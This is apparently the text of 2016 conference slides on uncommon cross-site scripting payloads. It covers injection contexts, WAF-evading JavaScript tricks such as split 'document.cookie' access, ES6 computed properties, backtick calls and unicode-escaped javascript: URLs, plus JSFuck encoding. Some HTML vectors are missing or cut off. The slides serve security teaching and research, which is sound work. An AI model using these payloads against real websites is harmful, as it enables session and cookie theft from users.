ESOTERIC XSS PAYLOADS c0c0n2016 @riyazwalikar @wincmdfu RIYAZ WALIKAR Chief Offensive Security Officer @Appsecco Security evangelist, leader for null Bangalore and OWASP chapters Trainer/Speaker : BlackHat, defcon, nullcon, c0c0n, OWASP AppSec USA Twitter : @riyazwalikar and @wincmdfu http://ibreak.soware WHAT IS THIS TALK ABOUT? Quick contexts Uncommon XSS vectors WHAT ARE INJECTION CONTEXTS?

Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact that user input appearing in the page would depend on the context in which the browser tries to interpret the user input.

Lavakumar Kuppan, IronWASP 3 MOST COMMON INJECTION CONTEXTS HTML context HTML Element context Script context HTML CONTEXT

Welcome user_tainted_input! HTML ELEMENT CONTEXT


Welcome bob!

Common vectors?

Multiple ways of representation document.cookie document['cookie'] document['coo'+'kie'] eval('doc'+'ument')['coo'+ 'kie'] Autoscrolling the page


New HTML Elements

Using the CDATA section inside SVG

><image xlink:href=" Using DATA URIs

Using the embed tag

Overwriting the ReferenceError object

ES6 Computed properties

({[alert(1)]: 1})

({[eval('ale'+'rt')(0)]: 1 }) Back ticks FTW! No enclosing required: alert `1`

Expansion of \u{61} and backticks loc\u{61}tion=j\u{61}vascript:alert`1` Prototyping the .toString() method

Object.prototype[Symbol.toStringTag]=''; location=':1+{}' JSFUCK JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code - ()+[]!

false => ![] true => !![] undefined => [][[]] NaN => +[![]] 0 => +[] 1 => +!+[] 2 => !+[]+!+[] 10 => [+!+[]]+[+[]] Array => [] Number => +[] String => []+[] Boolean => ![] Function => []["filter"] eval => []["filter"]["constructor"]( CODE )() window => []["filter"]["constructor"]("return this")() alert(0)


The ES6 specification coupled with new HTML 5 elements and event handlers can be used to bypass most blacklist based web application firewalls. A lot of active research has been done in this area by @0x6D6172696F and the good folks at cure53 Q & A http://ibreak.soware @riyazwalikar @wincmdfu REFERENCES: site-scripting-brief.html